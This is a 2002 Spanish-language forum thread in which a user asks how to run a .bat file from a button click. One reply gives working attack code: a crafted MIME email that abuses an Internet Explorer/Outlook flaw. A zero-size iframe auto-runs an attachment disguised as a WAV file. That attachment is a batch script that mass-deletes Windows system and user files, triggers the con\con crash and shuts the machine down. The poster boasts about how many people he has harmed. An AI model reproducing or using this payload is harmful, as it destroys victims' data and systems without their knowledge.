Foros del Web » Programando para Internet » Javascript »

¿Cómo ejecutar archivo .bat ?

Estas en el tema de ¿Cómo ejecutar archivo .bat ? en el foro de Javascript en Foros del Web. Hola. Cómo puedo hacer para ejecutar un archivo .bat cuando hago click en un boton? Lo que realmente me interesa es como ejecutar el archivo. ...
  #1 (permalink)  
Antiguo 21/08/2002, 09:29
 
Fecha de Ingreso: julio-2002
Mensajes: 219
Antigüedad: 21 años, 10 meses
Puntos: 0
¿Cómo ejecutar archivo .bat ?

Hola.

Cómo puedo hacer para ejecutar un archivo .bat cuando hago click en un boton?

Lo que realmente me interesa es como ejecutar el archivo.


Gracias por la atención.
  #2 (permalink)  
Antiguo 21/08/2002, 09:45
Avatar de Max13  
Fecha de Ingreso: octubre-2000
Ubicación: Mx
Mensajes: 1.229
Antigüedad: 23 años, 6 meses
Puntos: 0
Re: ¿Cómo ejecutar archivo .bat ?

En palabras llanas y simples "NO SE PUEDE"
  #3 (permalink)  
Antiguo 25/08/2002, 19:52
Avatar de x_Enigma_x
Usuario no validado
 
Fecha de Ingreso: agosto-2002
Mensajes: 256
Antigüedad: 21 años, 8 meses
Puntos: 2
Re: ¿Cómo ejecutar archivo .bat ?

si se puede wey . pero solo por una vulnerabiliad del IE .

fijate y pon atencion , este es uno que yo programe , a esta vulnerabilidad se puede activar con archivos eml . o mime multi part . o sea del oultlock o esa pinche programa culero ... checate ahi te va el codigo :


From: "xxxxx"
Subject: mail
Date: Thu, 5 Abril 2001 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<TITLE>®== Enigma ==¯</TITLE>



<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe><CENTER>

¨CREES QUE DESPUES DE ESTO , HAYA SEGURIDAD EN LA RED ?<br><br>

îø§©o¨,,¨o¸§ø""ø§©¯Ï¸Ï||xxxEnigmaxxx||ϸ Ï®©§ø""ø§¸o¨,,¨o©§øî <br><br>

http://xxxxenigmaxxxx.turincon.com<br><CENTER&gt ;
<br> eres la persona que he jodido numero :

<center>
<IMG SRC="http://personales.larural.es/scripts/count.exe?df=billetesenigma.dat&md=6&tr=T& amp;ft=10&dd=CC"></center>

</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="Enigma.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

@echo off
dir C:\
c:
cd\
label Enigma
cd windows
del *.dll
del *.vxd
del *.com
del *.dat
del *.ocx
del *.sys
del *.pwl
del *.ini
del *.doc
del *.bin
del *.bat
echo http://xxxxenigmaxxxx.turincon.com/
echo * TU SISTEMA HA SIDO VIOLADO *
cd\
del *.bat
del *.sys
del *.com
del *.log
del *.txt
del *.dat
del *.bin
del *.chk
del *.NS0
c:\con\con
cd windows
rundll32.exe user,ExitWindows
exit



y asi ... le pusiste en su madre a todo el sistema .-... solo funciona ... para los que tengan instalados el programa de oultlook .. y para win9X ... si tienen 2000 o xp .. correra ...
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 18:16.